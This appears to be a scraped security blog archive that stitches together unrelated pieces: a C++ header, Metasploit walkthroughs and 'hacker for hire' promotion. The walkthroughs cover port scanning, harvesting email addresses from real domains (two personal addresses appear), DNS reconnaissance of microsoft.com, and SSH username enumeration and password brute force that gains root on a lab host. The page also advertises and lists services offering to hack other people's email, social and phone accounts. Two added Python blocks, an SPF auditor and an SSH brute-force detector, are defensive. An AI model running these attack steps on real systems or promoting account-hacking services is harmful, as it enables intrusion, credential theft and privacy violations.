C++ Header file



#ifndef HELL_H   // if HELL_H is not defined yet, go on to the next preprocessor line
#define HELL_H   // well, include the header!

#include <iostream>
#include <string>

void testing1();
void testing();

class Test {
public:
    std::string t;
    void h();
};

#endif   // protection done!



Compiling the sources with g++ is simple:

g++ main.cpp main2.cpp -o main

pro@pusheax:~/coding/c++/basic/multi$ ./main
Test
Test
Hello world 2
LALA
C++ method


Thanks for reading!











How to use IBM AppScan Software to scan website - Found tutorial on centralhacker.com

Hacker For Hire

Hacker for hire? What do you mean by that?

PushEax now offers ethical hacker for hire services widely.



What PushEax can do for you?

Website hacking & security analysis, account security checking, virus removal, computer forensics and many more.



Does it cost money to hire a hacker?

PushEax will work hard for you, so it costs money!



How many services do you provide?

There are many hacker for hire services PushEax offers. If something is missing, just contact us.


PushEax deals with server hacking, password hacking, email hacking and more security analysis services. PushEax now provides most kinds of white hat hacking services widely ....... More Details!

Metasploit Port Scanning

Port scanning is often done by hackers and penetration testers to identify and discover the services running on a target host. Port scanning is an important step for gathering more information about the target host. Today we will see how to use Metasploit to scan ports. Metasploit is a free, open source and popular exploitation framework, widely used by hackers and professional penetration testers. Let's see how we can use Metasploit for basic port scanning.

If you have Kali Linux then Metasploit is already installed! Otherwise download it from Rapid7 and install it.


Our Target: http://192.168.67.136/ 


Our first module is auxiliary/scanner/portscan/syn


Now let's start scanning!

msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > show options

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   INTERFACE                   no        The name of the interface
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                      yes       The target address range or CIDR identifier
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    500              yes       The reply read timeout in milliseconds
We only need to set RHOSTS, which is 192.168.67.136, and the port range PORTS, 1-65535 (do you really want to scan every port?)

msf auxiliary(syn) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(syn) > set PORTS 80,3306,22,1337
PORTS => 80,3306,22,1337
msf auxiliary(syn) >


Now set the interesting ports and execute the "run" command:

 msf auxiliary(syn) > set PORTS 80,3306,22,1337,139
PORTS => 80,3306,22,1337,139
msf auxiliary(syn) > run

[*]  TCP OPEN 192.168.67.136:22
[*]  TCP OPEN 192.168.67.136:80
[*]  TCP OPEN 192.168.67.136:139
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(syn) >


Now let's see how auxiliary/scanner/portscan/tcp works:

msf auxiliary(tcp) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(tcp) > set PORTS 80,3306,22,1337,139
PORTS => 80,3306,22,1337,139
msf auxiliary(tcp) > run

[*] 192.168.67.136:139 - TCP OPEN
[*] 192.168.67.136:22 - TCP OPEN
[*] 192.168.67.136:80 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >



Really easy, but nmap is best!

More Metasploit Tutorials Coming soon! :)

Metasploit Information Gathering Basic[Search for info]

Metasploit is an open source penetration testing framework. Using some Metasploit auxiliary modules we can gather information about our target. Let's see how to do it in simple steps to collect email addresses.

 msf > use auxiliary/gather/search_email_collector
msf auxiliary(search_email_collector) > show options

Module options (auxiliary/gather/search_email_collector):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   DOMAIN                          yes       The domain name to locate email addresses for
   OUTFILE                         no        A filename to store the generated email list
   SEARCH_BING    true             yes       Enable Bing as a backend search engine
   SEARCH_GOOGLE  true             yes       Enable Google as a backend search engine
   SEARCH_YAHOO   true             yes       Enable Yahoo! as a backend search engine

msf auxiliary(search_email_collector) > set DOMAIN microsoft.com
DOMAIN => microsoft.com
msf auxiliary(search_email_collector) > run

[*] Harvesting emails .....
[*] Searching Google for email addresses from microsoft.com
[*] Extracting emails from Google search results...
[*] Searching Bing email addresses from microsoft.com
[*] Extracting emails from Bing search results...
[*] Searching Yahoo for email addresses from microsoft.com
[*] Extracting emails from Yahoo search results...
[*] Located 0 email addresses for microsoft.com
[*] Auxiliary module execution completed
msf auxiliary(search_email_collector) > set DOMAIN cisco.com
DOMAIN => cisco.com
msf auxiliary(search_email_collector) > run

[*] Harvesting emails .....
[*] Searching Google for email addresses from cisco.com
[*] Extracting emails from Google search results...
[*] Searching Bing email addresses from cisco.com
[*] Extracting emails from Bing search results...
[*] Searching Yahoo for email addresses from cisco.com
[*] Extracting emails from Yahoo search results...
[*] Located 2 email addresses for cisco.com
[*]     gsahagun@cisco.com
[*]     vern@cisco.com
[*] Auxiliary module execution completed
msf auxiliary(search_email_collector) >


Is Microsoft a little scared to post their email addresses publicly?

Let's find some DNS information about microsoft.com with Metasploit:

msf auxiliary(shodan_search) > use auxiliary/gather/dns_info
msf auxiliary(dns_info) > show options

Module options (auxiliary/gather/dns_info):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   DOMAIN                   yes       The target domain name
   NS                       no        Specify the name server to use for queries, otherwise use the system configured DNS Server is used.

msf auxiliary(dns_info) > set DOMAIN microsoft.com
DOMAIN => microsoft.com
msf auxiliary(dns_info) > run

[*] Enumerating microsoft.com
[+] microsoft.com - Address 134.170.188.221 found. Record type: A
[+] microsoft.com - Address 134.170.185.46 found. Record type: A
[+] microsoft.com - Name server ns4.msft.net (208.76.45.53) found. Record type: NS
[+] microsoft.com - Name server ns4.msft.net (2620:0:37::53) found. Record type: NS
[+] microsoft.com - Name server ns1.msft.net (208.84.0.53) found. Record type: NS
[+] microsoft.com - Name server ns1.msft.net (2620:0:30::53) found. Record type: NS
[+] microsoft.com - Name server ns2.msft.net (208.84.2.53) found. Record type: NS
[+] microsoft.com - Name server ns2.msft.net (2620:0:32::53) found. Record type: NS
[+] microsoft.com - Name server ns3.msft.net (193.221.113.53) found. Record type: NS
[+] microsoft.com - Name server ns3.msft.net (2620:0:34::53) found. Record type: NS
[+] microsoft.com - ns1.msft.net (208.84.0.53) found. Record type: SOA
[+] microsoft.com - ns1.msft.net (2620:0:30::53) found. Record type: SOA
[+] microsoft.com - Mail server microsoft-com.mail.protection.outlook.com (207.46.163.170) found. Record type: MX
[+] microsoft.com - Mail server microsoft-com.mail.protection.outlook.com (207.46.163.138) found. Record type: MX
[+] microsoft.com - Mail server microsoft-com.mail.protection.outlook.com (207.46.163.215) found. Record type: MX
[+] microsoft.com - Text info found: v=spf1 include:_spf-a.microsoft.com include:_spf-b.microsoft.com include:_spf-c.microsoft.com include:_spf-ssg-a.microsoft.com include:spf-a.hotmail.com ip4:147.243.128.24 ip4:147.243.128.26 ip4:147.243.128.25 ip4:147.243.1.47 ip4:147.243.1.48 -all . Record type: TXT
[+] microsoft.com - Text info found: FbUF6DbkE+Aw1/wi9xgDi8KVrIIZus5v8L6tbIQZkGrQ/rVQKJi8CjQbBtWtE64ey4NJJwj5J65PIggVYNabdQ== . Record type: TXT
[*] Auxiliary module execution completed
msf auxiliary(dns_info) > 
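The TXT record dns_info pulled back is the domain's SPF policy, and it is worth knowing how to read one when auditing your own domain. The following is an added example, not part of the original post or of Metasploit: it parses the record shown above into mechanisms, reports the policy for senders that match nothing, and counts the terms that cost a DNS lookup (RFC 7208 allows at most 10). Function names are this example's own, and include targets are not fetched, so it runs offline.

```python
"""Audit the SPF TXT record that dns_info returned for microsoft.com above.

Added example, not part of the original post or of Metasploit. It splits the
record into mechanisms, reports what happens to senders that match nothing
(the 'all' qualifier) and counts the mechanisms that cost a DNS lookup, which
RFC 7208 limits to 10 per evaluation. Includes are not resolved, so this runs
offline; the record constant is copied from the dns_info output above.
"""
import ipaddress

SPF_RECORD = (
    "v=spf1 include:_spf-a.microsoft.com include:_spf-b.microsoft.com "
    "include:_spf-c.microsoft.com include:_spf-ssg-a.microsoft.com "
    "include:spf-a.hotmail.com ip4:147.243.128.24 ip4:147.243.128.26 "
    "ip4:147.243.128.25 ip4:147.243.1.47 ip4:147.243.1.48 -all"
)

# Terms that need a DNS query when the receiver evaluates the record.
LOOKUP_TERMS = {"include", "a", "mx", "ptr", "exists", "redirect"}
QUALIFIER = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def parse_spf(record):
    """Return a list of (qualifier, name, value) for every term after v=spf1."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF version 1 record")
    parsed = []
    for term in terms[1:]:
        if term.partition("=")[0].lower() in ("redirect", "exp"):   # modifiers, no qualifier
            name, value = term.split("=", 1)
            parsed.append(("+", name.lower(), value))
            continue
        qualifier = "+"                                              # default qualifier is pass
        if term[0] in QUALIFIER:
            qualifier, term = term[0], term[1:]
        name, _, value = term.partition(":")
        parsed.append((qualifier, name.lower(), value))
    return parsed


def audit_spf(record):
    """Summarise policy for unmatched senders, DNS lookup cost and listed networks."""
    parsed = parse_spf(record)
    lookups = sum(1 for _, name, _ in parsed if name in LOOKUP_TERMS)
    all_policy = None
    networks = []
    for qualifier, name, value in parsed:
        if name == "all":
            all_policy = QUALIFIER[qualifier]
        elif name in ("ip4", "ip6"):
            networks.append(str(ipaddress.ip_network(value, strict=False)))
    findings = []
    if all_policy is None:
        findings.append("no 'all' term: senders matching nothing get an implicit neutral")
    elif all_policy in ("pass", "neutral"):
        findings.append(f"'{all_policy}' for unmatched senders lets anyone spoof the domain")
    if lookups > 10:
        findings.append(f"{lookups} lookup terms exceed the RFC 7208 limit of 10 (permerror)")
    return {"all_policy": all_policy, "dns_lookups": lookups,
            "networks": networks, "findings": findings}


def directly_authorised(record, sender_ip):
    """True if sender_ip falls inside an ip4/ip6 term (include targets are not fetched)."""
    ip = ipaddress.ip_address(sender_ip)
    return any(ip in ipaddress.ip_network(value, strict=False)
               for _, name, value in parse_spf(record) if name in ("ip4", "ip6"))
```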



To find SRV records, do the following:

msf auxiliary(dns_info) > use auxiliary/gather/dns_srv_enum
msf auxiliary(dns_srv_enum) > show options

Module options (auxiliary/gather/dns_srv_enum):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   ALL_NS  false            no        Run against all name servers for the given domain.
   DOMAIN                   yes       The target domain name.

msf auxiliary(dns_srv_enum) > set DOMAIN microsoft.com
DOMAIN => microsoft.com
msf auxiliary(dns_srv_enum) > run

[*] Enumerating SRV Records for microsoft.com
[+] Host: sipfed.microsoft.com IP: 131.107.255.86 Service: sipfederationtls Protocol: tcp Port: 5061
[+] Host: sipdog3.microsoft.com IP: 131.107.1.47 Service: xmpp-server Protocol: tcp Port: 5269
[*] Auxiliary module execution completed


I was a bit lazy to format the text as code, so this might be a little hard to read. But I think you now have a basic idea of how you can use Metasploit for information gathering. If you would like to see more details or have any questions .... you can post comments here.


  

Hacking SSH with Metasploit Auxiliary Modules

SSH is perhaps another popular service targeted by hackers. So in this post I am going to show you how to use Metasploit modules for a dictionary or brute force attack against an SSH server.

Firstly we need to find valid users for the password guessing attack. We can enumerate usernames with the Metasploit auxiliary/scanner/ssh/ssh_enumusers module:

msf auxiliary(dns_srv_enum) > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(ssh_enumusers) > show options

Module options (auxiliary/scanner/ssh/ssh_enumusers):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      22               yes       The target port
   THREADS    1                yes       The number of concurrent threads
   THRESHOLD  10               yes       Amount of seconds needed before a user is considered found
   USER_FILE                   yes       File containing usernames, one per line

msf auxiliary(ssh_enumusers) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_enumusers) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
msf auxiliary(ssh_enumusers) > set USER_FILE /root/Desktop/users
USER_FILE => /root/Desktop/users
msf auxiliary(ssh_enumusers) > run

[*] 192.168.67.136:22 - SSH - Checking for false positives
[*] 192.168.67.136:22 - SSH - Starting scan
[+] 192.168.67.136:22 - SSH - User 'root' found
[!] 192.168.67.136:22 - SSH - User 'owaspbroken' not found
[!] 192.168.67.136:22 - SSH - User 'broken' not found
[!] 192.168.67.136:22 - SSH - User 'mag' not found
[!] 192.168.67.136:22 - SSH - User 'admin' not found
[!] 192.168.67.136:22 - SSH - User 'Administrator' not found
[!] 192.168.67.136:22 - SSH - User 'owaspbwa' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_enumusers) >


The username 'root' was found. Let's do something else.... thinking... thinking!

Let's find out the SSH version for future reference when looking for exploits:

msf auxiliary(ssh_enumusers) > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_version) > run

[*] 192.168.67.136:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed




Well, now let's guess the password. Always try to have a good password list, otherwise it will be a waste of time; SSH is slow for password guessing. Anyway, here is how we can hack the SSH server:

msf auxiliary(ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login) > set USER_FILE /root/Desktop/users
USER_FILE => /root/Desktop/users
msf auxiliary(ssh_login) > set USERASS_FILE true
USERASS_FILE => true
msf auxiliary(ssh_login) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_login) > run

[*] 192.168.67.136:22 SSH - Starting bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set PASSWORD owaspbwa
PASSWORD => owaspbwa
msf auxiliary(ssh_login) > run

[*] 192.168.67.136:22 SSH - Starting bruteforce
[+] 192.168.67.136:22 SSH - Success: 'root:owaspbwa''uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Command shell session 1 opened (192.168.67.139:44027 -> 192.168.67.136:22) at 2014-12-17 04:23:57 -0500
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'Administrator:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbwa:owaspbwa'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE /root/Desktop/users
PASS_FILE => /root/Desktop/users
msf auxiliary(ssh_login) > run

[*] 192.168.67.136:22 SSH - Starting bruteforce
[+] 192.168.67.136:22 SSH - Success: 'root:owaspbwa''uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Command shell session 2 opened (192.168.67.139:43450 -> 192.168.67.136:22) at 2014-12-17 04:25:06 -0500
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:root'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:broken'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:mag'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:admin'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:root'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'broken:broken'
[-] 192.168.67.136:22 SSH - Failed: 'broken:mag'
[-] 192.168.67.136:22 SSH - Failed: 'broken:admin'
[-] 192.168.67.136:22 SSH - Failed: 'broken:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:root'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'mag:broken'
[-] 192.168.67.136:22 SSH - Failed: 'mag:mag'
[-] 192.168.67.136:22 SSH - Failed: 'mag:admin'
[-] 192.168.67.136:22 SSH - Failed: 'mag:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:root'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'admin:broken'
[-] 192.168.67.136:22 SSH - Failed: 'admin:mag'
[-] 192.168.67.136:22 SSH - Failed: 'admin:admin'
[-] 192.168.67.136:22 SSH - Failed: 'admin:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >
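Seen from the server side, the two ssh_login runs above leave very different traces in the sshd log: the USER_FILE plus PASSWORD run is one password sprayed across many accounts, the USERNAME plus PASS_FILE run is many passwords against root, and each ends in an accepted login from the same source. The following is an added example, not part of the original post or of Metasploit, that recognises both patterns from constructed sshd log lines modelled on that session; the thresholds and function name are this example's own.

```python
"""Detect the two ssh_login patterns shown above from sshd log lines.

Added example, not part of the original post or of Metasploit. The log lines
are constructed to mirror the two runs above: one password tried against many
users (spraying), then many passwords tried against root (targeted brute
force), each followed by a successful login from the same source. Thresholds
are this example's own choices.
"""
import re
from collections import Counter, defaultdict

FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED_RE = re.compile(r"Accepted (?:password|publickey) for (\S+) from (\S+) port \d+")

MIN_FAILURES = 5   # failures from one source before it is reported at all
SPRAY_USERS = 3    # distinct usernames that make a burst look like spraying

# Constructed sample, modelled on the ssh_login output above (scanner at 192.168.67.139).
SAMPLE_LOG = """\
Dec 17 04:23:55 owaspbwa sshd[2101]: Failed password for invalid user owaspbroken from 192.168.67.139 port 44027 ssh2
Dec 17 04:23:55 owaspbwa sshd[2102]: Failed password for invalid user broken from 192.168.67.139 port 44028 ssh2
Dec 17 04:23:56 owaspbwa sshd[2103]: Failed password for invalid user mag from 192.168.67.139 port 44029 ssh2
Dec 17 04:23:56 owaspbwa sshd[2104]: Failed password for admin from 192.168.67.139 port 44030 ssh2
Dec 17 04:23:56 owaspbwa sshd[2105]: Failed password for invalid user Administrator from 192.168.67.139 port 44031 ssh2
Dec 17 04:23:57 owaspbwa sshd[2106]: Accepted password for root from 192.168.67.139 port 44032 ssh2
Dec 17 04:25:01 owaspbwa sshd[2201]: Failed password for root from 192.168.67.139 port 43450 ssh2
Dec 17 04:25:02 owaspbwa sshd[2202]: Failed password for root from 192.168.67.139 port 43451 ssh2
Dec 17 04:25:02 owaspbwa sshd[2203]: Failed password for root from 192.168.67.139 port 43452 ssh2
Dec 17 04:25:03 owaspbwa sshd[2204]: Failed password for root from 192.168.67.139 port 43453 ssh2
Dec 17 04:25:04 owaspbwa sshd[2205]: Failed password for root from 192.168.67.139 port 43454 ssh2
Dec 17 04:25:06 owaspbwa sshd[2206]: Accepted password for root from 192.168.67.139 port 43455 ssh2
Dec 17 04:30:00 owaspbwa sshd[2300]: Accepted publickey for root from 10.0.0.5 port 50000 ssh2
Dec 17 04:31:12 owaspbwa sshd[2301]: Failed password for root from 10.0.0.7 port 50100 ssh2
"""


def analyse(log_text):
    """Return {source_ip: finding} for sources with at least MIN_FAILURES failures.

    Each finding lists the failure count, the usernames tried, the attack
    patterns recognised and any account that later authenticated from that source.
    """
    failed_users = defaultdict(Counter)   # ip -> Counter of usernames that failed
    accepted = defaultdict(set)           # ip -> usernames that logged in
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failed_users[m.group(2)][m.group(1)] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            accepted[m.group(2)].add(m.group(1))

    findings = {}
    for ip, counts in failed_users.items():
        total = sum(counts.values())
        if total < MIN_FAILURES:
            continue
        patterns = []
        if len(counts) >= SPRAY_USERS:            # one password, many users
            patterns.append("password spraying")
        for user, n in counts.items():            # many passwords, one user
            if n >= MIN_FAILURES:
                patterns.append(f"brute force against {user}")
        findings[ip] = {
            "failures": total,
            "users": sorted(counts),
            "patterns": patterns,
            "compromised": sorted(accepted.get(ip, ())),  # success after failures
        }
    return findings
```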


Let me know if you have questions!

Integer and String Based SQL Injection Tutorial

After getting the tutorial about IBM AppScan from Central Hacker, who also claim to be hackers for hire, I found two more tutorials on SQL injection.

They used SQLI-LAB, but it is still good to follow. As hackers for hire, should they post examples and tutorials against real sites?

Anyway, you can read these tutorials on their blog:

Integer Single Quote SQL Injection  

String Based SQL Injection





Note: pusheax does not have any relation with this kind of company. This is just about sharing documents!

Want to hire hackers? Some Hackers for Hire Website List

I have seen some hackers for hire companies advertising their hacking services. They promise to hack email passwords, social account passwords, databases, even smartphones.

Some of them are fake hackers for hire companies (their customers complain) and some are real companies where you can hire a professional hacker.

I will list some companies here, but it is your responsibility to verify them before working with them, because I am not reviewing their services. It is just a short list of hacking services websites. So be careful!


Hackers for Hire site list

  1. centralhacker.com (Central hacker seems legit though)
  2. hirehackeronline.com (SEO purpose or real?)
  3. hacker1337.com ( Hacker 1337 open for long time)
  4. goldenhacker.com (Golden Hacker , Mean gold hacker?)
  5. hackeris.com
  6. neighborhoodhacker.com (Long time in business? Do they do the job?)
  7. hirethehacker.com (SEO Purpose or real)
  8. cryptohackers.com
  9. hireanhacker.com
  10. hirenhack.com (Seems new in business!)

Again, I am not reviewing their hacking services. This list is for those who are looking to hire a hacker.

Warning: be careful, most of them might be just a scam and some may be for real!!!